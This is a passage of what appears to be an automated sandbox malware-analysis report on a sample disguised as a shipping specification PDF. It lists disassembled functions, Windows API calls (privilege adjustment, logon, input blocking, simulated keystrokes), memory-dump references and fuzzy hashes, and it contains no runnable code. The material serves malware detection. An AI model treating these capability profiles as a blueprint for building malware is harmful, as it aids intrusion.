                                      • SetErrorMode.KERNEL32(00000001), ref: 0038E20D
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0038E267
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0038E2B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: 0c77b25283b4a09881800f8a4f709dde2665ad2da8dcac3d99c4923676c72652
                                      • Instruction ID: 4e72fb554b14474ad5eb9f14ccf74022327f422870c28e8a56450e8d49c21976
                                      • Opcode Fuzzy Hash: 0c77b25283b4a09881800f8a4f709dde2665ad2da8dcac3d99c4923676c72652
                                      • Instruction Fuzzy Hash: B5213135A00218DFDB01EF95D885EAEBBB8FF49310F1484A9E946EB261DB31A905CB50
                                      Function 0037B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0037B1AD
                                      • GetLastError.KERNEL32 ref: 0037B1BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                      • String ID:
                                      • API String ID: 4244140340-0
                                      • Opcode ID: 53f03cc2540fc3826e134b27be3f707bb218f7eb3b58b6f6eb9fc0e86b461eef
                                      • Instruction ID: 915be22b454caaad652f85f940d69bc3d82305f5284ae58f3120ccb501087e5a
                                      • Opcode Fuzzy Hash: 53f03cc2540fc3826e134b27be3f707bb218f7eb3b58b6f6eb9fc0e86b461eef
                                      • Instruction Fuzzy Hash: 7F11CEB2400204AFE729AF68DCC5D2BB7BCFB44310B20852EF45A97650EB74FC418B60
                                      Function 00386606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00386623
                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00386664
                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0038666F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle
                                      • String ID:
                                      • API String ID: 33631002-0
                                      • Opcode ID: 71387ca21d166dadfdea43f067ead5183e5402f9835da6b2dca13255933bfa09
                                      • Instruction ID: 6bcd5af943c2f1051fb885492bceec41bffbf3da9c407505268529f9e9ba61ab
                                      • Opcode Fuzzy Hash: 71387ca21d166dadfdea43f067ead5183e5402f9835da6b2dca13255933bfa09
                                      • Instruction Fuzzy Hash: 5C111E71E01228BFDB119FA5DC45FAEBBBCEB85B10F104166F900E6290D7B05A058BA5
                                      Function 003871FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00387223
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0038723A
                                      • FreeSid.ADVAPI32(?), ref: 0038724A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: 88983a04af2fe873dc1c5521302bc129c35ef3b4e3f652a69a262d92abc7e284
                                      • Instruction ID: c602cfd5944d227768445864c50f5a420866230c51cefedc715a79159464715c
                                      • Opcode Fuzzy Hash: 88983a04af2fe873dc1c5521302bc129c35ef3b4e3f652a69a262d92abc7e284
                                      • Instruction Fuzzy Hash: B3F0FF75904219BBDB05DBE8DD89EADBBBDEB08301F104469A502E2191E270A6458B10
                                      Function 0038F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0038F599
                                      • FindClose.KERNEL32(00000000), ref: 0038F5C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: e8f4ca8b6861a889efc4f3a958ba4ae11a6a1020045cac01f84bcedebd1e4ab1
                                      • Instruction ID: 56523cf24332ba623d7e39eb746d448078d0be5b039f793157fa5ee936579fc5
                                      • Opcode Fuzzy Hash: e8f4ca8b6861a889efc4f3a958ba4ae11a6a1020045cac01f84bcedebd1e4ab1
                                      • Instruction Fuzzy Hash: 4D11C4316002009FD711EF28D845E2EB3E8FF85325F04896EF8A6DB2A1CB30BD048B85
                                      Function 0038CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0039BE6A,?,?,00000000,?), ref: 0038CEA7
                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0039BE6A,?,?,00000000,?), ref: 0038CEB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 93715c6d84ec722e39eda056c8674c57f79af7a301dc4c85420b04c9f1871501
                                      • Instruction ID: 021cc91f8f168a9e5d2b19295ddc77d7f934a49d3dfa845ce86ab3f3384621a8
                                      • Opcode Fuzzy Hash: 93715c6d84ec722e39eda056c8674c57f79af7a301dc4c85420b04c9f1871501
                                      • Instruction Fuzzy Hash: 0DF08235111329ABDB11ABA4DC49FEA776DBF08351F008165F915E6181D770AA40CBA0
                                      Function 0038411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00384153
                                      • keybd_event.USER32(?,7617A2E0,?,00000000), ref: 00384166
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: InputSendkeybd_event
                                      • String ID:
                                      • API String ID: 3536248340-0
                                      • Opcode ID: 5321757cbb26d9fa35bacfcfe7a224c65cbbd9759f5b3c53d7db9180e870c366
                                      • Instruction ID: 47ed2347eaffa4f778c14809b24d0e738507f819d67f3c4c6adb6ba6e25a6bce
                                      • Opcode Fuzzy Hash: 5321757cbb26d9fa35bacfcfe7a224c65cbbd9759f5b3c53d7db9180e870c366
                                      • Instruction Fuzzy Hash: B7F06D7090034EAFDB069FA0C809BBE7BB4EF00305F008059F96596191D77996129FA0
                                      Function 0037AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0037ACC0), ref: 0037AB99
                                      • CloseHandle.KERNEL32(?,?,0037ACC0), ref: 0037ABAB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      • Opcode ID: 7cc5433f76a77575e441bec59e5beb30381fbcab79cde166354f03b2905a763f
                                      • Instruction ID: 17cf7a4dbe3ab899857ab988496a5320d1a9bc942a3710a498397d28fc72923e
                                      • Opcode Fuzzy Hash: 7cc5433f76a77575e441bec59e5beb30381fbcab79cde166354f03b2905a763f
                                      • Instruction Fuzzy Hash: C0E0B676000610AFE7262F64EC09D76BBADEB44321B208839B89A85870DB62AC949B50
                                      Function 003681AC Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00366DB3,-0000031A,?,?,00000001), ref: 003681B1
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003681BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: bf07bd30d489025e2ded1912705f8d9907c2083fa0641f8f7df2c8e97304e743
                                      • Instruction ID: 969d538149f7b068e648568b120c08fa81f8ed6d7fec25e94e71d5536edabd24
                                      • Opcode Fuzzy Hash: bf07bd30d489025e2ded1912705f8d9907c2083fa0641f8f7df2c8e97304e743
                                      • Instruction Fuzzy Hash: FDB09236044648ABDB022BA1EC09F587F6CEB48752F014021F60D840618B7264108B92
                                      Function 003477B0 Relevance: 2.3, Strings: 1, Instructions: 1076COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \Q?
                                      • API String ID: 0-2401325038
                                      • Opcode ID: 19e902b013831c5e59991c6e0cdd56531c821848313b734a27f56b123a878649
                                      • Instruction ID: bf73d9f3df542fe61645aefd980ab387fabbe47d01d33d5e22e670c72516b2d4
                                      • Opcode Fuzzy Hash: 19e902b013831c5e59991c6e0cdd56531c821848313b734a27f56b123a878649
                                      • Instruction Fuzzy Hash: 77A23B74904219CFCB26CF58C880BADBBF5FF49314F2681A9D859AB391D734AE81DB50
                                      Function 0036CCC1 Relevance: 1.8, APIs: 1, Instructions: 269COMMON
                                      Download Yara Rule
                                      APIs
                                      • RaiseException.KERNEL32(?,00000000,00000001,?,?,00000008,?,?,0036CCBC,?,?,00000008,?,?,00375AC4,00000000), ref: 0036CEEC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 3472466c3429d668d2dc29b88c2548dd7754f4b7fe6bea1655e858a2a232f874
                                      • Instruction ID: 87d42306c4f742aff1f0bdd23427ae6277ae62a9206620cd3af741f0aeeb69ff
                                      • Opcode Fuzzy Hash: 3472466c3429d668d2dc29b88c2548dd7754f4b7fe6bea1655e858a2a232f874
                                      • Instruction Fuzzy Hash: 6AB14A316206089FD716CF28C48AB647BE1FF44365F26D658E8DACF2A5C736E991CB40
                                      Function 00396AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 00396ACA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: 01d7372ce15ac00d2f04cb6cb62b29ce4c9fa7928220f8c530be5163d9cc9b2d
                                      • Instruction ID: 7281cde32ad78e31d045d7f07e3f12ba0205689d9765d77592aad4ce1af4082e
                                      • Opcode Fuzzy Hash: 01d7372ce15ac00d2f04cb6cb62b29ce4c9fa7928220f8c530be5163d9cc9b2d
                                      • Instruction Fuzzy Hash: 49E048752002046FC701EF5DD405D56B7ECAFB4751F04C826F945DB261DAB4F8048B90
                                      Function 003874BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003874DE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: mouse_event
                                      • String ID:
                                      • API String ID: 2434400541-0
                                      • Opcode ID: a9238f93f2a4dfef7f4244d6f584b04af948ac84af14987a36314b26b9c8a046
                                      • Instruction ID: f55e8c025028b3f9f5e8087677e8d45ba3067b661686cd29631404b781d3f10e
                                      • Opcode Fuzzy Hash: a9238f93f2a4dfef7f4244d6f584b04af948ac84af14987a36314b26b9c8a046
                                      • Instruction Fuzzy Hash: BBD017A116C30528E86B27268C0FE760D0AB3017C0FA281C9B082CB4C2A890E8419322
                                      Function 0037B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0037AD3E), ref: 0037B124
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LogonUser
                                      • String ID:
                                      • API String ID: 1244722697-0
                                      • Opcode ID: ac8a7684495a53c0dad433adb5449fddeb46ab76e396277b510fbcc10450e00e
                                      • Instruction ID: 3ddd800b0238830e31928f434938351b97faafc4bfb7e6c4565cb1f22d8a9e48
                                      • Opcode Fuzzy Hash: ac8a7684495a53c0dad433adb5449fddeb46ab76e396277b510fbcc10450e00e
                                      • Instruction Fuzzy Hash: 4FD09E321A465EAEDF025FA4DC06EAE3F6AEB04701F448511FA15D50A1C675D532AB50
                                      Function 003BB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: 659aea33b55f52a57caeb1639e4dd61203741273133debf77e9beadda54fdb7f
                                      • Instruction ID: b4d09410828885e75fd20503df3b4c4f8771999a64d7ad7048d55cbd827a7c28
                                      • Opcode Fuzzy Hash: 659aea33b55f52a57caeb1639e4dd61203741273133debf77e9beadda54fdb7f
                                      • Instruction Fuzzy Hash: 9AC04CB1400519DFC752CBC4C944DEEBBBCAB04705F104091A205F1510D7709B459B72
                                      Function 00368189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0036818F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: bbe10ca8d1f228efb2e57369ccff9672afad8825d41c9cb50f1e7a10eca280fa
                                      • Instruction ID: c0941c94a92eba0e3fb1f1d5d24a2bf024f9d3ae856ecc726d16c9ef3ea4985a
                                      • Opcode Fuzzy Hash: bbe10ca8d1f228efb2e57369ccff9672afad8825d41c9cb50f1e7a10eca280fa
                                      • Instruction Fuzzy Hash: 00A0113200020CAB8F022B82EC088883F2CEA002A0B000022F80C800208B22A8208A82
                                      Function 0037724D Relevance: .7, Instructions: 676COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3fabd00a3ef493a2bfa36f3f95790ae5c2f9a34efa10ea84ad151e813386841
                                      • Instruction ID: fe292e836f6711cf2f242e3c8754d3de476b6aa56e9db570abfbdf7f034a506b
                                      • Opcode Fuzzy Hash: c3fabd00a3ef493a2bfa36f3f95790ae5c2f9a34efa10ea84ad151e813386841
                                      • Instruction Fuzzy Hash: B9329E75E082498FDB36CFA8C4857ECBBB6BF09310F65852AD859EB291D3399C45CB40
                                      Function 0036D1B9 Relevance: .6, Instructions: 645COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
